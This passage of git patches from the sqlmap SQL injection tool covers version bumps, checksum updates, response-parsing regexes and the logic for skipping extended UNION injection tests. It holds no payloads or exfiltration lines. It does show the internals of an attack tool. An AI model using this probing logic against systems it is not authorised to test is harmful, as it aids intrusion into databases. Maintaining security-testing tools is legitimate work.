[Y/n]" - if readInput(message, default='Y', boolean=True): + message = "do you want to try to fetch the latest 'zipball' from repository and extract it (experimental) ? [y/N]" + if readInput(message, default='N', boolean=True): directory = os.path.abspath(paths.SQLMAP_ROOT_PATH) try: diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 7fd8c7e67ee..9875df82eb9 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -46,14 +46,14 @@ ffa5f01f39b17c8d73423acca6cfe86a lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -f126d635d4d09efd76120f31ae2023ba lib/core/settings.py +997084efaeadc2d679c5f540503bbff3 lib/core/settings.py 0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 12f8c42ed742581644f6476a7d80dcf8 lib/core/target.py 72d499ca8d792e90a1ebfb2ad2341a51 lib/core/testing.py de9922a29c71a235cb95a916ff925db2 lib/core/threads.py c40758411bb0bd68764d78e0bb72bd0f lib/core/unescaper.py -bf7f5fc45f9ca25f403066b5642cdc67 lib/core/update.py +af2d1810b6a7ebc61689a53c253ddbaa lib/core/update.py e772deb63270375e685fa5a7b775c382 lib/core/wordlist.py 1e5532ede194ac9c083891c2f02bca93 lib/__init__.py 7620f1f4b8791e13c7184c06b5421754 lib/parse/banner.py From 6875c40a0620bed00d8d773f594455c9e448b60f Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Fri, 16 Mar 2018 14:20:43 +0100 Subject: [PATCH 073/428] Minor update of permission problems detection --- lib/core/settings.py | 4 ++-- lib/request/connect.py | 6 +++++- txt/checksum.md5 | 4 ++-- 3 files changed, 9 insertions(+), 5 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 6f6f05cefc9..df40a0ddd98 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.3.27" +VERSION = "1.2.3.28" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) @@ -83,7 +83,7 @@ TEXT_CONTENT_TYPE_REGEX = r"(?i)(text|form|message|xml|javascript|ecmascript|json)" # Regular expression used for recognition of generic permission messages -PERMISSION_DENIED_REGEX = r"(command|permission|access)\s*(was|is)?\s*denied" +PERMISSION_DENIED_REGEX = r"(?P(command|permission|access)\s*(was|is)?\s*denied)" # Regular expression used in recognition of generic protection mechanisms GENERIC_PROTECTION_REGEX = r"(?i)\b(rejected|blocked|protection|incident|denied|detected|dangerous|firewall)\b" diff --git a/lib/request/connect.py b/lib/request/connect.py index e0ea2a5322d..54c2ae3239c 100644 --- a/lib/request/connect.py +++ b/lib/request/connect.py @@ -1261,7 +1261,11 @@ def _randomizeParameter(paramString, randomParameter): page = removeReflectiveValues(page, payload) kb.maxConnectionsFlag = re.search(MAX_CONNECTIONS_REGEX, page or "", re.I) is not None - kb.permissionFlag = re.search(PERMISSION_DENIED_REGEX, page or "", re.I) is not None + + message = extractRegexResult(PERMISSION_DENIED_REGEX, page or "", re.I) + if message: + kb.permissionFlag = True + singleTimeWarnMessage("potential permission problems detected ('%s')" % message) if content or response: return page, headers, code diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 9875df82eb9..59f5f6859c1 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -46,7 +46,7 @@ ffa5f01f39b17c8d73423acca6cfe86a lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -997084efaeadc2d679c5f540503bbff3 lib/core/settings.py +00642325552444173985fa13b74f5b3f lib/core/settings.py 0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 12f8c42ed742581644f6476a7d80dcf8 lib/core/target.py @@ -68,7 +68,7 @@ ec4e56bbb1349176b2a22e0b99ba6a55 lib/parse/payloads.py 30eed3a92a04ed2c29770e1b10d39dc0 lib/request/basicauthhandler.py 53c38db67dd4b14fbceee71e4748f874 lib/request/basic.py c0cabedead14b8a23353b606672cff42 lib/request/comparison.py -b91eaa32c602182c4f6e2f7d6de61267 lib/request/connect.py +156376d6a08eb4bc0df31ee79f08820e lib/request/connect.py dd4598675027fae99f2e2475b05986da lib/request/direct.py 2044fce3f4ffa268fcfaaf63241b1e64 lib/request/dns.py eee965d781546d05f36cfd14af050913 lib/request/httpshandler.py From d7f24458140224eb4d596d757894553cd872597e Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Fri, 16 Mar 2018 14:25:27 +0100 Subject: [PATCH 074/428] Minor patch of error message parsing regex --- lib/core/settings.py | 2 +- txt/checksum.md5 | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index df40a0ddd98..19d0eea6ca4 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -322,7 +322,7 @@ # Regular expressions used for parsing error messages (--parse-errors) ERROR_PARSING_REGEXES = ( r"[^<]*(fatal|error|warning|exception)[^<]*:?\s*(?P.+?)", - r"(?m)^(fatal|error|warning|exception):?\s*(?P[^\n]+?)$", + r"(?m)^\s*(fatal|error|warning|exception):?\s*(?P[^\n]+?)$", r"(?P[^\n>]*SQL Syntax[^\n<]+)", r"
  • Error Type:
    (?P.+?)
    • ", r"CDbCommand (?P[^<>\n]*SQL[^<>\n]+)", diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 59f5f6859c1..c248aa2a57f 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -46,7 +46,7 @@ ffa5f01f39b17c8d73423acca6cfe86a lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -00642325552444173985fa13b74f5b3f lib/core/settings.py +bae0e851c66391ef08200e29dc75e64f lib/core/settings.py 0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 12f8c42ed742581644f6476a7d80dcf8 lib/core/target.py From 01fb07f68c54cb25174b7c6c4e2c11bd168856d6 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Fri, 16 Mar 2018 14:28:37 +0100 Subject: [PATCH 075/428] Minor patch (message for --check-internet) --- lib/controller/controller.py | 2 +- lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 4 insertions(+), 4 deletions(-) diff --git a/lib/controller/controller.py b/lib/controller/controller.py index 4e0fbfaa78b..9c3239d03fe 100644 --- a/lib/controller/controller.py +++ b/lib/controller/controller.py @@ -286,7 +286,7 @@ def start(): try: if conf.checkInternet: - infoMsg = "[INFO] checking for Internet connection" + infoMsg = "checking for Internet connection" logger.info(infoMsg) if not checkInternet(): diff --git a/lib/core/settings.py b/lib/core/settings.py index 19d0eea6ca4..94986c9e5c5 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.3.28" +VERSION = "1.2.3.29" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index c248aa2a57f..51325d9b03a 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -22,7 +22,7 @@ c88d66597f4aab719bde4542b0a1a6e0 extra/shutils/regressiontest.py b3e60ea4e18a65c48515d04aab28ff68 extra/sqlharvest/sqlharvest.py 0f581182871148b0456a691ae85b04c0 lib/controller/action.py 62a348c0ed32c7e67cd456680791cad5 lib/controller/checks.py -2ba69df20a4ca72b4255761c3463b8a4 lib/controller/controller.py +33689bb1b064d4eebc216934795a595f lib/controller/controller.py c7443613a0a2505b1faec931cee2a6ef lib/controller/handler.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py b1990c7805943f0c973a853bba981d96 lib/core/agent.py @@ -46,7 +46,7 @@ ffa5f01f39b17c8d73423acca6cfe86a lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -bae0e851c66391ef08200e29dc75e64f lib/core/settings.py +5e64961566640262b0cd92c15b623647 lib/core/settings.py 0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 12f8c42ed742581644f6476a7d80dcf8 lib/core/target.py From a27f21cb1d0ec8d2c844c80391658d5ffdfb5305 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Fri, 16 Mar 2018 14:30:47 +0100 Subject: [PATCH 076/428] Trivial message updates --- lib/core/option.py | 4 ++-- lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 5 insertions(+), 5 deletions(-) diff --git a/lib/core/option.py b/lib/core/option.py index b842c890fe9..ca4c45959c5 100644 --- a/lib/core/option.py +++ b/lib/core/option.py @@ -2542,11 +2542,11 @@ def _basicOptionValidation(): raise SqlmapSyntaxException(errMsg) if conf.checkTor and not any((conf.tor, conf.proxy)): - errMsg = "switch '--check-tor' requires usage of switch '--tor' (or option '--proxy' with HTTP proxy address using Tor)" + errMsg = "switch '--check-tor' requires usage of switch '--tor' (or option '--proxy' with HTTP proxy address of Tor service)" raise SqlmapSyntaxException(errMsg) if conf.torPort is not None and not (isinstance(conf.torPort, int) and conf.torPort >= 0 and conf.torPort <= 65535): - errMsg = "value for option '--tor-port' must be in range 0-65535" + errMsg = "value for option '--tor-port' must be in range [0, 65535]" raise SqlmapSyntaxException(errMsg) if conf.torType not in getPublicTypeMembers(PROXY_TYPE, True): diff --git a/lib/core/settings.py b/lib/core/settings.py index 94986c9e5c5..7957ac9b32b 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.3.29" +VERSION = "1.2.3.30" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 51325d9b03a..bd2302bb7c2 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -40,13 +40,13 @@ cada93357a7321655927fc9625b3bfec lib/core/exception.py 1e5532ede194ac9c083891c2f02bca93 lib/core/__init__.py 458a194764805cd8312c14ecd4be4d1e lib/core/log.py c9a56e58984420a5abb7a3f7aadc196d lib/core/optiondict.py -911ec851f2cad046036ddaf776c8559f lib/core/option.py +aa2301ab9a331b228c1c83cdaa2bd79b lib/core/option.py 7cfd04e583cca782b843f6f6d973981a lib/core/profiling.py ffa5f01f39b17c8d73423acca6cfe86a lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -5e64961566640262b0cd92c15b623647 lib/core/settings.py +9c99add278af896b8cffcdf6b898ca9c lib/core/settings.py 0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 12f8c42ed742581644f6476a7d80dcf8 lib/core/target.py From ac68eed65d744b40c094d58106a49042700fff89 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Fri, 16 Mar 2018 14:33:22 +0100 Subject: [PATCH 077/428] Trivial code style update --- lib/core/option.py | 2 -- lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 3 insertions(+), 5 deletions(-) diff --git a/lib/core/option.py b/lib/core/option.py index ca4c45959c5..63582f5d995 100644 --- a/lib/core/option.py +++ b/lib/core/option.py @@ -2316,7 +2316,6 @@ def _setTorHttpProxySettings(): errMsg = "can't establish connection with the Tor HTTP proxy. " errMsg += "Please make sure that you have Tor (bundle) installed and setup " errMsg += "so you could be able to successfully use switch '--tor' " - raise SqlmapConnectionException(errMsg) if not conf.checkTor: @@ -2337,7 +2336,6 @@ def _setTorSocksProxySettings(): errMsg = "can't establish connection with the Tor SOCKS proxy. " errMsg += "Please make sure that you have Tor service installed and setup " errMsg += "so you could be able to successfully use switch '--tor' " - raise SqlmapConnectionException(errMsg) # SOCKS5 to prevent DNS leaks (http://en.wikipedia.org/wiki/Tor_%28anonymity_network%29) diff --git a/lib/core/settings.py b/lib/core/settings.py index 7957ac9b32b..d887a877587 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.3.30" +VERSION = "1.2.3.31" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index bd2302bb7c2..59f2e47c664 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -40,13 +40,13 @@ cada93357a7321655927fc9625b3bfec lib/core/exception.py 1e5532ede194ac9c083891c2f02bca93 lib/core/__init__.py 458a194764805cd8312c14ecd4be4d1e lib/core/log.py c9a56e58984420a5abb7a3f7aadc196d lib/core/optiondict.py -aa2301ab9a331b228c1c83cdaa2bd79b lib/core/option.py +b7c3e98e5400d73e9ce5c1a30145f7c6 lib/core/option.py 7cfd04e583cca782b843f6f6d973981a lib/core/profiling.py ffa5f01f39b17c8d73423acca6cfe86a lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -9c99add278af896b8cffcdf6b898ca9c lib/core/settings.py +424f33989eb6a1aeafe09c49cf03a5e7 lib/core/settings.py 0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 12f8c42ed742581644f6476a7d80dcf8 lib/core/target.py From a6809e03efdb53990f04a07db9fb47a3cbf5ee61 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Fri, 16 Mar 2018 14:38:47 +0100 Subject: [PATCH 078/428] Minor just in case patch --- lib/core/common.py | 2 +- lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 4 insertions(+), 4 deletions(-) diff --git a/lib/core/common.py b/lib/core/common.py index a64e962ed2a..3ac16fa1772 100644 --- a/lib/core/common.py +++ b/lib/core/common.py @@ -1417,7 +1417,7 @@ def parseTargetUrl(): raise SqlmapGenericException(errMsg) if not re.search(r"^http[s]*://", conf.url, re.I) and not re.search(r"^ws[s]*://", conf.url, re.I): - if ":443/" in conf.url: + if re.search(r":443\b", conf.url): conf.url = "https://%s" % conf.url else: conf.url = "http://%s" % conf.url diff --git a/lib/core/settings.py b/lib/core/settings.py index d887a877587..baf815e853e 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.3.31" +VERSION = "1.2.3.32" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 59f2e47c664..42c62007f28 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -27,7 +27,7 @@ c7443613a0a2505b1faec931cee2a6ef lib/controller/handler.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py b1990c7805943f0c973a853bba981d96 lib/core/agent.py fd8f239e259afaf5f24bcf34a0ad187f lib/core/bigarray.py -6266f487eeafeccab0c2d7f43d20e85c lib/core/common.py +10654e525e0740a8a0df9b1baab455d2 lib/core/common.py 1c4c4bf8eacc911378a2e4b2f9f03184 lib/core/convert.py 9f87391b6a3395f7f50830b391264f27 lib/core/data.py 72016ea5c994a711a262fd64572a0fcd lib/core/datatype.py @@ -46,7 +46,7 @@ ffa5f01f39b17c8d73423acca6cfe86a lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -424f33989eb6a1aeafe09c49cf03a5e7 lib/core/settings.py +17745353e1c638259aca7f77cf2d34b8 lib/core/settings.py 0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 12f8c42ed742581644f6476a7d80dcf8 lib/core/target.py From 6c2b7cff80e2ad9c3157326ef3c42e11376e1f20 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Fri, 16 Mar 2018 15:11:04 +0100 Subject: [PATCH 079/428] Minor patch of UNION checking logic --- lib/controller/checks.py | 30 +++++++++++++++++------------- lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 20 insertions(+), 16 deletions(-) diff --git a/lib/controller/checks.py b/lib/controller/checks.py index 4733f178b90..e54f8461ac7 100644 --- a/lib/controller/checks.py +++ b/lib/controller/checks.py @@ -203,7 +203,7 @@ def checkSqlInjection(place, parameter, value): continue match = re.search(r"(\d+)-(\d+)", test.request.columns) - if injection.data and match: + if match and injection.data: lower, upper = int(match.group(1)), int(match.group(2)) for _ in (lower, upper): if _ > 1: @@ -329,6 +329,22 @@ def checkSqlInjection(place, parameter, value): logger.debug(debugMsg) continue + match = re.search(r"(\d+)-(\d+)", test.request.columns) + if match and not injection.data: + _ = test.request.columns.split('-')[-1] + if conf.uCols is None and _.isdigit() and int(_) > 10: + if kb.futileUnion is None: + msg = "it is not recommended to perform " + msg += "extended UNION tests if there is not " + msg += "at least one other (potential) " + msg += "technique found. Do you want to skip? [Y/n] " + kb.futileUnion = not readInput(msg, default='Y', boolean=True) + + if kb.futileUnion is False: + debugMsg = "skipping test '%s'" % title + logger.debug(debugMsg) + continue + infoMsg = "testing '%s'" % title logger.info(infoMsg) @@ -653,18 +669,6 @@ def genCmpPayload(): infoMsg += "there is at least one other (potential) " infoMsg += "technique found" singleTimeLogMessage(infoMsg) - elif not injection.data: - _ = test.request.columns.split('-')[-1] - if _.isdigit() and int(_) > 10: - if kb.futileUnion is None: - msg = "it is not recommended to perform " - msg += "extended UNION tests if there is not " - msg += "at least one other (potential) " - msg += "technique found. Do you want to skip? [Y/n] " - - kb.futileUnion = not readInput(msg, default='Y', boolean=True) - if kb.futileUnion is False: - continue # Test for UNION query SQL injection reqPayload, vector = unionTest(comment, place, parameter, value, prefix, suffix) diff --git a/lib/core/settings.py b/lib/core/settings.py index baf815e853e..c324909657d 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.3.32" +VERSION = "1.2.3.33" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 42c62007f28..bd6de5e7aea 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -21,7 +21,7 @@ c88d66597f4aab719bde4542b0a1a6e0 extra/shutils/regressiontest.py 1e5532ede194ac9c083891c2f02bca93 extra/sqlharvest/__init__.py b3e60ea4e18a65c48515d04aab28ff68 extra/sqlharvest/sqlharvest.py 0f581182871148b0456a691ae85b04c0 lib/controller/action.py -62a348c0ed32c7e67cd456680791cad5 lib/controller/checks.py +a6751962ab23d450857c11f7466dd43c lib/controller/checks.py 33689bb1b064d4eebc216934795a595f lib/controller/controller.py c7443613a0a2505b1faec931cee2a6ef lib/controller/handler.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py @@ -46,7 +46,7 @@ ffa5f01f39b17c8d73423acca6cfe86a lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -17745353e1c638259aca7f77cf2d34b8 lib/core/settings.py +a719b1091a4864e59d43f003f8f0155b lib/core/settings.py 0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 12f8c42ed742581644f6476a7d80dcf8 lib/core/target.py From 74de40b9c51685102efc4018df722dfb063889e2 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Fri, 16 Mar 2018 15:21:19 +0100 Subject: [PATCH 080/428] Minor patch of a previous commit --- lib/controller/checks.py | 31 ++++++++++++++++--------------- lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 19 insertions(+), 18 deletions(-) diff --git a/lib/controller/checks.py b/lib/controller/checks.py index e54f8461ac7..b8e54cfe946 100644 --- a/lib/controller/checks.py +++ b/lib/controller/checks.py @@ -329,21 +329,22 @@ def checkSqlInjection(place, parameter, value): logger.debug(debugMsg) continue - match = re.search(r"(\d+)-(\d+)", test.request.columns) - if match and not injection.data: - _ = test.request.columns.split('-')[-1] - if conf.uCols is None and _.isdigit() and int(_) > 10: - if kb.futileUnion is None: - msg = "it is not recommended to perform " - msg += "extended UNION tests if there is not " - msg += "at least one other (potential) " - msg += "technique found. Do you want to skip? [Y/n] " - kb.futileUnion = not readInput(msg, default='Y', boolean=True) - - if kb.futileUnion is False: - debugMsg = "skipping test '%s'" % title - logger.debug(debugMsg) - continue + if stype == PAYLOAD.TECHNIQUE.UNION: + match = re.search(r"(\d+)-(\d+)", test.request.columns) + if match and not injection.data: + _ = test.request.columns.split('-')[-1] + if conf.uCols is None and _.isdigit() and int(_) > 10: + if kb.futileUnion is None: + msg = "it is not recommended to perform " + msg += "extended UNION tests if there is not " + msg += "at least one other (potential) " + msg += "technique found. Do you want to skip? [Y/n] " + kb.futileUnion = not readInput(msg, default='Y', boolean=True) + + if kb.futileUnion is False: + debugMsg = "skipping test '%s'" % title + logger.debug(debugMsg) + continue infoMsg = "testing '%s'" % title logger.info(infoMsg) diff --git a/lib/core/settings.py b/lib/core/settings.py index c324909657d..86896113997 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.3.33" +VERSION = "1.2.3.34" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index bd6de5e7aea..cb5ffa03c36 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -21,7 +21,7 @@ c88d66597f4aab719bde4542b0a1a6e0 extra/shutils/regressiontest.py 1e5532ede194ac9c083891c2f02bca93 extra/sqlharvest/__init__.py b3e60ea4e18a65c48515d04aab28ff68 extra/sqlharvest/sqlharvest.py 0f581182871148b0456a691ae85b04c0 lib/controller/action.py -a6751962ab23d450857c11f7466dd43c lib/controller/checks.py +e15cd43d7bd71d04990494d13897c490 lib/controller/checks.py 33689bb1b064d4eebc216934795a595f lib/controller/controller.py c7443613a0a2505b1faec931cee2a6ef lib/controller/handler.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py @@ -46,7 +46,7 @@ ffa5f01f39b17c8d73423acca6cfe86a lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -a719b1091a4864e59d43f003f8f0155b lib/core/settings.py +7c1b5473621cf472755e6a0a13e3cd0e lib/core/settings.py 0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 12f8c42ed742581644f6476a7d80dcf8 lib/core/target.py From e088fe08ecb90dbfd67df9a1484c983a1aac95f5 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Mon, 19 Mar 2018 00:33:30 +0100 Subject: [PATCH 081/428] Update related to the #2995 --- lib/core/settings.py | 2 +- lib/request/connect.py | 6 +++++- txt/checksum.md5 | 4 ++-- 3 files changed, 8 insertions(+), 4 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 86896113997..4862798b86d 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.3.34" +VERSION = "1.2.3.35" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/request/connect.py b/lib/request/connect.py index 54c2ae3239c..4f2defc2856 100644 --- a/lib/request/connect.py +++ b/lib/request/connect.py @@ -187,12 +187,13 @@ def _connReadProxy(conn): if not kb.dnsMode and conn: headers = conn.info() - if headers and hasattr(headers, "getheader") and (headers.getheader(HTTP_HEADER.CONTENT_ENCODING, "").lower() in ("gzip", "deflate") or "text" not in headers.getheader(HTTP_HEADER.CONTENT_TYPE, "").lower()): + if kb.pageCompress and headers and hasattr(headers, "getheader") and (headers.getheader(HTTP_HEADER.CONTENT_ENCODING, "").lower() in ("gzip", "deflate") or "text" not in headers.getheader(HTTP_HEADER.CONTENT_TYPE, "").lower()): retVal = conn.read(MAX_CONNECTION_TOTAL_SIZE) if len(retVal) == MAX_CONNECTION_TOTAL_SIZE: warnMsg = "large compressed response detected. Disabling compression" singleTimeWarnMessage(warnMsg) kb.pageCompress = False + raise SqlmapCompressionException else: while True: if not conn: @@ -682,6 +683,9 @@ class _(dict): status = re.search(r"Handshake status ([\d]{3})", tbMsg) errMsg = "websocket handshake status %s" % status.group(1) if status else "unknown" raise SqlmapConnectionException(errMsg) + elif "SqlmapCompressionException" in tbMsg: + warnMsg = "problems with response (de)compression" + retrying = True else: warnMsg = "unable to connect to the target URL" diff --git a/txt/checksum.md5 b/txt/checksum.md5 index cb5ffa03c36..d4a2fb008fe 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -46,7 +46,7 @@ ffa5f01f39b17c8d73423acca6cfe86a lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -7c1b5473621cf472755e6a0a13e3cd0e lib/core/settings.py +c6d64920b174a1fc445d6833b96a192a lib/core/settings.py 0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 12f8c42ed742581644f6476a7d80dcf8 lib/core/target.py @@ -68,7 +68,7 @@ ec4e56bbb1349176b2a22e0b99ba6a55 lib/parse/payloads.py 30eed3a92a04ed2c29770e1b10d39dc0 lib/request/basicauthhandler.py 53c38db67dd4b14fbceee71e4748f874 lib/request/basic.py c0cabedead14b8a23353b606672cff42 lib/request/comparison.py -156376d6a08eb4bc0df31ee79f08820e lib/request/connect.py +b51c3f8b5cc65c6d7c81471577afd87d lib/request/connect.py dd4598675027fae99f2e2475b05986da lib/request/direct.py 2044fce3f4ffa268fcfaaf63241b1e64 lib/request/dns.py eee965d781546d05f36cfd14af050913 lib/request/httpshandler.py From ee431cd83b5f33d75cfd40bd73395dd722c22f96 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Mon, 19 Mar 2018 00:39:48 +0100 Subject: [PATCH 082/428] Minor update --- lib/core/settings.py | 2 +- txt/checksum.md5 | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 4862798b86d..cbb779cd7bb 100644 --- 